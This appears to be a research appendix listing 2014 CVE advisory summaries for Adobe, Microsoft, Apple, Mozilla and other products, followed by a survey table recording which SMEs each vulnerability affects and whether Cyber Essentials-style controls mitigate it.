CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
